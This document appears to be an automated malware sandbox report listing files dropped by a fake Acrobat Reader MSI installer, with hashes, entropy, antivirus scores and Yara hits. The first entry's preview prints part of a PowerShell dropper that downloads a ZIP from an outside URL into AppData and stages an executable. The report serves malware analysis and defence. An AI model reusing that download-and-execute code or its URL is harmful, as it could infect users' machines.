                                                                  Entropy (8bit):3.675353316794349
                                                                  Encrypted:false
                                                                  SSDEEP:24:Q9JtqNV5ulw3SettBR32rB1lSKfilUx2yaUx6FXSCixpJDJWQ1UMkWkCCNiDo:2J3l2tVGVnSKql42ya4QXSvxpV1HcCNc
                                                                  MD5:A938D9A326C20FD849F361B499A95243
                                                                  SHA1:CB8953B28AB30301A56CCA350F9B002CCB22772B
                                                                  SHA-256:A2EC8DF26CE63F5EA21A0134948F6983228D421B1C4B38D6924852F4113A268B
                                                                  SHA-512:75CA75F84540F8FBA04EBC4743C00AED6686183D6C68DD765669646813000B85C79D18724F87535ED358749EEF4710ABA18E20D933BFF2DA51FCD09A3E0B7554
                                                                  Malicious:true
                                                                  Preview:..$.u.r.l. .=. .".h.t.t.p.s.:././.p.u.b.l.i.c...a.d.o.b.e.c.c...c.o.m./.f.i.l.e.s./.1.C.R.U.S.W.G.2.5.3.M.B.K.5.O.S.U.B.R.D.H.4.V.0.3.3.R.F.F.F.".....$.d.o.w.n.l.o.a.d.D.i.r. .=. .".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.g.e.r.e.n.c.i.a.d.o.r._.d.o._.t.r.a.b.a.l.h.a.d.o.r.".....$.d.a.t.e. .=. .G.e.t.-.D.a.t.e. .-.F.o.r.m.a.t. .".d.d.M.M.y.y.y.y.".....$.o.u.t.F.i.l.e. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.$.d.a.t.e...z.i.p.".....$.e.x.e.c.u.t.a.b.l.e.P.a.t.h. .=. .".$.d.o.w.n.l.o.a.d.D.i.r.\.W.e.b.E.x.p.e.r.i.e.n.c.e.H.o.s.t.A.p.p...e.x.e.".........f.u.n.c.t.i.o.n. .D.o.w.n.l.o.a.d. .{..... . . . .p.a.r.a.m.(.$.u.r.l.,. .$.o.u.t.p.u.t.)..... . . . .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.u.r.l.,. .$.o.u.t.p.u.t.).....}.........D.o.w.n.l.o.a.d. .-.u.r.l. .$.u.r.l. .-.o.u.t.p.u.t. .$.o.u.t.F.i.l.e.........i.f. .(.T.e.s.t.-.P.a.t.h. .$.o.u.t.F.i.l.e.). .{..... . . . .W.r.i.t.e.-.H.o.s.t. .".A.r.q.u.i.v.o. .Z.I.P. .b.
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):21216487
                                                                  Entropy (8bit):7.998444391910956
                                                                  Encrypted:true
                                                                  SSDEEP:393216:ET0BKUqWoZXydqqcygIosQNfMiSmnBxiaVPchUOoJK8ggT3eYJy:JBpqBygBFsQmitjiaO+LMXgSuy
                                                                  MD5:06D5966A1D06A3DFBF106A06045C211A
                                                                  SHA1:B305FB4E98B51C5B3AF7DD129A8D091CB1729E1D
                                                                  SHA-256:97EDC45A65F6CDE75CB87EAE366FED6C25B1F914C5CFFA63D4ABC20DF0BE74CE
                                                                  SHA-512:22D1C2E016CC4823D24BADED66500C3124CCEE751EEA0FC43CE1A0669A75AA5C8D5E81EA3ABDF309B6CD9689A69DA932D679E371DBA7381162F32D3B3CA4600C
                                                                  Malicious:true
                                                                  Preview:D_...........L................W|f{yq;Uddx}wu`}{z;D_...........L............6...W|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;D_...........Lx.m.........-...W|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;%&":$:" #,:%&#:yuz}rqg`y....$.P.2...........CG." .zY.....Yr.. ......2]J..O..@.....|a..YX..N%.5..>..,J4....Hr. 7..c.....c*F.G.<q2.Wa.mE...j..j..G.}}K.....D...d.sp...|b..]..D_...........L-EU.....4.>.8...W|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;w|f{yq:qlq.imh.Q.d[.5....T@.....v.....T.~.TD.H.<....u.U..r.}.EB.waC....H..%.4.....F-P.u,.<2.&.o.nr.D....._...A.JA.nC..:._.t..5Z......[-.a.....].C.!....1....h..*x.n.......Y..8.uid.!s....k.T.4................w....J..`s..%A..`.T(.*R...&....~~...a.[.>l.-..h.'.y._.u%H)c....P.AV.|.4......!...C.......i.u..+aMi....OS..X..S<...8..D.:).'.!....O....u.;...4...m.o.uJ;h....._...../.s....t...?(`.ou....(7...>.....-.*DJ...C..k?.UW...be...H..sXo........j.+.I.s.!.......%..$.I..mdR.7..YniI:.c.9-.Z|2..A(..h....*..~...HG/.F+.-..........IH......2.".../.H.{....g..
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):55808
                                                                  Entropy (8bit):5.776679906561504
                                                                  Encrypted:false
                                                                  SSDEEP:1536:11fhFN4g5OkVtgaUFAUoBMmDxdgUhpzz:1RhL5RAFADTxzz
                                                                  MD5:53AB9B8198E8AD8D3A043F40E72B1AB1
                                                                  SHA1:51F27E895808A806D2EA7F22CD91C50C4C7CDF5F
                                                                  SHA-256:1E9CD852EF2E7233E12090ED41BA99019D533CC07EDADFE5095CD0DDACC4FC1E
                                                                  SHA-512:7A7FE0BA46A92D0A5CE8A1ABFBEE97BA8F5EA3A7F8898D1DE6024ECC3C3209F159FB76B11B08B7ECAA6F152DEE974BD68316A06485E8CA6EE14EBC8C63DBC6FE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a.r.2.r.2.r.2U..3.r.2U..3.r.2U..3.r.2U..3.r.2..d2.r.2.r.2.r.2...3.r.2...2.r.2...3.r.2Rich.r.2................PE..d...Gg.d.........."..........Z.................@............................. ......@\....`............................................................................................p...............................8............................................text...\........................... ..`.rdata...8.......:..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):258736
                                                                  Entropy (8bit):6.781393000027508
                                                                  Encrypted:false
                                                                  SSDEEP:6144:tn/Hw5J0LRoPdtX6NWhBAUMXHuOCmu9XIGR:1QL0LsoW4UMXHuOcB
                                                                  MD5:3CDF5CBDBC53E82C799F76DA8F91BDD9
                                                                  SHA1:C8F4A3617C4F0BEF70455AB53010F6340BBE5F57
                                                                  SHA-256:597D19BAEE0EF83E312A807B7004CB7324336F0B558DA48CE44A299B60362136
                                                                  SHA-512:6E9826AD7373998581E5C2B7A0BEA6DEDF79130878304A0B22168BBA88165518E810D9F93D82F7285F9E35C89BAC60D1D25F6218B1636C7B64AFB24D5FE058D7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J......Z...Z...Z)G.[...Z)G.[...Z)G.[...Z)G.[...Z..`Z...Z.f=Z!..Z.LsZ...Z...ZS..Z...Z...Z.G.[...Z.G.[<..Z.G.[...Z.GQZ...Z.G.[...ZRich...Z........PE..L...g7.V.........."!.....\...T......@........p............................... ......0.....@Q........................`>...+...............................>......p/...@..T...................tA.......A..\....................=..@....................text...OZ.......\.................. ..`.data...@6...p.......`..............@....idata..~............h..............@..@.didat...............x..............@....tls....u............z..............@....rsrc................|..............@..@.reloc..p/.......0..................@..B........................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):571168
                                                                  Entropy (8bit):6.509615420946833
                                                                  Encrypted:false
                                                                  SSDEEP:12288:tZeEtnsE9Diw9NF9WPz81b5q1ilJpr8hpEygKlvwWAIQEKZm+jWodEEVTJd34/:tZe6yg7LIQEKZm+jWodEEJJdc
                                                                  MD5:15DD460E592E59C2CE7F553328739DFC
                                                                  SHA1:BA2BAB7649C7FBC18E3FF38B71368839A5588657
                                                                  SHA-256:F7F46F09AA38B6FAA5DBFD2B192EB9A5D63E9D5EEC482624FC20E6686F59098D
                                                                  SHA-512:31330DB59F930C4E2923074FFC6ED051D68916B3F7EFD09EDD11B7E51A0F58BB6DDC576F306FF2195E717A1B5B44316A3A7B11FE4C9E17BEC255EA8E8068F0DE
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P.p.1h#.1h#.1h#.I.#.1h#.1i#91h#,Fi".1h#,Fl".1h#,Fk".1h#,Fm".1h#,Fh".1h#,F.#.1h#,Fj".1h#Rich.1h#........................PE..d.....Za.........." .....@...X......./..............................................=T....`Q.........................................4..@...@................p...9...... 7......0......T...........................0...8............P...............................text....>.......@.................. ..`.rdata..D....P.......D..............@..@.data... 9...0......................@....pdata...9...p...:...8..............@..@.rsrc................r..............@..@.reloc..0............v..............@..B........................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):397664
                                                                  Entropy (8bit):6.3562644384745655
                                                                  Encrypted:false
                                                                  SSDEEP:6144:9fLtIx4FFDinA8Jh9XFHG/s9yrFp28s0C0KJ9fBIv9wCOfeC61S9HIl:xi6FFDaA+XVG/s9yrFpBGJtKwCJeIl
                                                                  MD5:71B3CACB316C4AEDDC8CE2D82FEA307A
                                                                  SHA1:883D5ACD1E14C85C1BA7B793F74E03C0FACD0684
                                                                  SHA-256:8768E0E8C9BD1670D7896E2968E70810AF822B461439DE7453B2E5873BFB3A00
                                                                  SHA-512:274424A039919DFC5510462D9D129550DB5D5BED1C735496D24CAC96EE1DE798BDB1DD832804DEEBD81307DCF1D6A778275262BC7F6E9E498AB1F751CAA20BBB
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,h..h...h...h....y..n....fw.j...aq..H...h........~..a....~..s....~..`....~..l....~..d....~..i....~u.i...h...i....~..i...Richh...........................PE..d.....Za.........." .........B......0A.......................................0......Y.....`Q........................................0...08..`P..........`$.......5......`1... ..(...|#..T....................%..(....#..8............................................text............................... ..`.rdata..............................@..@.data...X3...p...,...P..............@....pdata...5.......6...|..............@..@.rsrc...`$.......&..................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):333088
                                                                  Entropy (8bit):5.973829257868023
                                                                  Encrypted:false
                                                                  SSDEEP:6144:Azdy9XA1tDhdU+XbrzZSW1t9o7VUI0ltsT:Ao9W3dPXb4SHoKts
                                                                  MD5:900E194755EE739953D15C29E7E692E9
                                                                  SHA1:1DE7533C302EABA2CE0D5C09204228522824B723
                                                                  SHA-256:594BABC5ED05826AAF2AEC0750BE135EFF2876C9B941D2E99B6B1E278073C96A
                                                                  SHA-512:3DD25BD5EC4746A74A14B399A469B0C7ACEC0BC9222800841AFF6E92616D2FBB43DDB2FB7F5EE33D58FED45A00CF8B4931B04D4C07699BD30F1780E9D82BB6A4
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5..q...q...q...x...]...q..........v......k......y......u......`......p.....v.p......p...Richq...........PE..d.....Za.........." .....t...v.......s....................................... ............`Q.............................................>.............................. /..............T...............................8............................................text...vs.......t.................. ..`.rdata..l............x..............@..@.data........ ......................@....pdata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):61960
                                                                  Entropy (8bit):6.313785957582955
                                                                  Encrypted:false
                                                                  SSDEEP:1536:FzxzJ+xpDMmwsLMFD0WfLSxwKoUhw/1Yd5ZkD:FzxzJQpDHwQMFD0WuwKoUG/i2D
                                                                  MD5:E3FC37B45BA6D33AFACC2B26F935D442
                                                                  SHA1:805241C0C6AE7745A2CEBDFE8F8FABA3E5EAA0FA
                                                                  SHA-256:1187781D8AE000F52FDD0B1F69C46EE680CE18CC8934D107CB96456CDDC0B737
                                                                  SHA-512:3E63CDD375644A77C5951CD087443688C2F7573D6DB3BCE28600DB89F86E398C693B0B6EB24ABF96FD50162265D184B8CCA4AC74A7E5222CB0FB2D1B50B66D4C
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)c..)c..)c.. ...1c..)c...c......*c......,c....../c......,c......'c......(c....{.(c......(c..Rich)c..................PE..d.....Za.........." .....x...`.......b....................................... ......[.....`Q........................................@..........................(........&......$.......T...............................8............................................text....w.......x.................. ..`.rdata..n........0...|..............@..@.data...............................@....pdata..(...........................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):15426560
                                                                  Entropy (8bit):6.232350558867504
                                                                  Encrypted:false
                                                                  SSDEEP:98304:7fFGO0Mgb5Vh98jiOvZ5pqMurCVQuI4fPevJpFXflizzJh:0OngN398jiOvZEIQuI4fSXfm
                                                                  MD5:8506E4EF4EB1F5F4DD1E3A22F15D7075
                                                                  SHA1:D7E58019E2DAD01687D3FCE55AD980D655627E9D
                                                                  SHA-256:0E7AD27C0DAAFA34E930F3B44652802443B6C39F88134B984FEDC2FF1AE8BB64
                                                                  SHA-512:AA35ADA201E2265C4DEF0CE83FBEBB3C4B7C530D27CB7C1F74220565F80207E009E00765D8C81814A68CA20582024F73178A439BF4C6BD8EF231785B1CF16ACB
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 9%, Browse
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f.........." ..........S.....0.........@...........................................`.......................... ...........................N.......V6....p..............T..............................................................V....................text...l........................... ..`.data...............................@....bss.....................................idata...N.......P...|..............@....didata.V..........................@....edata...............b..............@..@.rdata..E............d..............@..@.reloc..T...........f..............@..B.pdata..p...........Z..............@..@.rsrc....V6......V6.................@..@.....................d..............@..@........................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):97632
                                                                  Entropy (8bit):6.409755640490607
                                                                  Encrypted:false
                                                                  SSDEEP:1536:upMm/eng35aehvWy3YevkYdmBaNBkKh8ehNK7TT0ecbe+4Z9Vvl:u2W9Lv9dVN1h8eLK7TwecbeVZDN
                                                                  MD5:27F73C8DAA6DF0A0769FBC0F28D2E955
                                                                  SHA1:A4FD3745C70C8C10D0DCCB9E2B56786D58BA7049
                                                                  SHA-256:FFF797E284CC21447515C478D1F97B89EFB2A49A6CCEF7D7F94B4DF76B5789DF
                                                                  SHA-512:B9A0823E42A57187838D5B10C169E2CC3A586AC92EAB82E4F915A83623131BA23E6D43C01E2356995AB7A94414DBB58D104BCC7966E5A5FC321F3EBD6CBD3663
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F..~...~...~......~.......~.}.}...~.}.z...~.}.{...~.}.~...~.}.....~.}.|...~.Rich..~.........................PE..d.....Za.........." .........b............................................................`Q........................................`A..8....I..,............p.......V..`'..........(+..T............................+..8...............h............................text............................... ..`.rdata..D@.......B..................@..@.data........`.......<..............@....pdata.......p.......@..............@..@_RDATA...............L..............@..@.rsrc................N..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {5B6FA660-828A-4D54-BAE1-600B3F823A73}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 9 22:09:24 2024, Number of Pages: 200
                                                                  Category:dropped
                                                                  Size (bytes):7456256
                                                                  Entropy (8bit):7.831579432330587
                                                                  Encrypted:false
                                                                  SSDEEP:98304:S+X+n/8/ZyU1AH4K3YuNr8ZFO2wB5qEp9ctHLcyew4r+eODtAIIMQY5dinV6pmMe:6/iyuAY8NrAOjLp2JcLniztAIL53A
                                                                  MD5:F316AEC665BED01D909032716DC813D4
                                                                  SHA1:225EFA49E02093D3110B5D36D9FC259135FAE33A
                                                                  SHA-256:B018842CB1708E4A80D0DFB8BF81ECF0E638AA652989E160E6BD8903E25F9E0C
                                                                  SHA-512:372A2C24DFC73FC3C799DA607EB5C0E7219AA25EFAF9C8E185DCDBEB80609B028CF5FF515512483B016C943CFBE9F277CC8FC3CE2E1A836DCCA3DC4E54E8C576
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\53e56a.msi, Author: Joe Security
                                                                  • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\53e56a.msi, Author: Joe Security
                                                                  Preview:......................>...................r...................................F.......b.......t.......................................s...............................................~...................................................................................................................................................................................................................................................................................................................................................................#...4........................................................................................... ...!..."...-...2...%...&...'...(...)...*...+...,.........../...0...1...5...3...<...?...6...7...8...9...:...;...E...=...>.......@...A...B...C...D...............H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):602432
                                                                  Entropy (8bit):6.469389454249605
                                                                  Encrypted:false
                                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):602432
                                                                  Entropy (8bit):6.469389454249605
                                                                  Encrypted:false
                                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):602432
                                                                  Entropy (8bit):6.469389454249605
                                                                  Encrypted:false
                                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):602432
                                                                  Entropy (8bit):6.469389454249605
                                                                  Encrypted:false
                                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):602432
                                                                  Entropy (8bit):6.469389454249605
                                                                  Encrypted:false
                                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):672771
                                                                  Entropy (8bit):6.593904264074014
                                                                  Encrypted:false
                                                                  SSDEEP:12288:furEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKg0:uihNREtRdYndJP32R7vKG+47/L025zEA
                                                                  MD5:6137BAD71C2D6594A785BF71AE14EE7A
                                                                  SHA1:94812FBC3D8A3AB4987D47334ADAFF04A17F3D26
                                                                  SHA-256:C82FFE2FFAB49AE33A8B89FE81A591A2252D364A3FAB38EA915FCB55E6F9BB24
                                                                  SHA-512:A281F245DF284841462C2035D917E09CDB86653615BD94F9F2054A4E4A401F048CD8D612822EA1E0302B75F0909D34766AC91DFE041E0138F031DEB2C6D13179
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\MSIE83E.tmp, Author: Joe Security
                                                                  Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{4433395F-681D-4D29-AC5B-870AC8B40C57}..Acrobat Reader..2024.0198840 298135.msi.@.....@.....@.....@........&.{5B6FA660-828A-4D54-BAE1-600B3F823A73}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}2.01:\Software\Acrobat Reader\Acrobat Reader\Version.@.......@.....@.....@......&.{66973ED1-FE65-4BFA-9786-51A78A35D3C5}=.C:\Users\user\AppData\Roaming\Acrobat Reader\Acrobat Reader\.@.......@.....@.....@......&.{1C3CF7CC-0B79-4D0C-B5C7-4E7B695092B2}F.C:\Users\user\AppData\Local\gerenciador_do_trabalhador\mrt100_app.dll.@.......@.....@.....@......&.{846297BD-3254-46D3-BB02-C5279035B4E3}H.C:\Users\user\AppData\Local\gerenciador_do_trabalhador\msvcp140_app.dll.
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):664896
                                                                  Entropy (8bit):6.580379078260005
                                                                  Encrypted:false
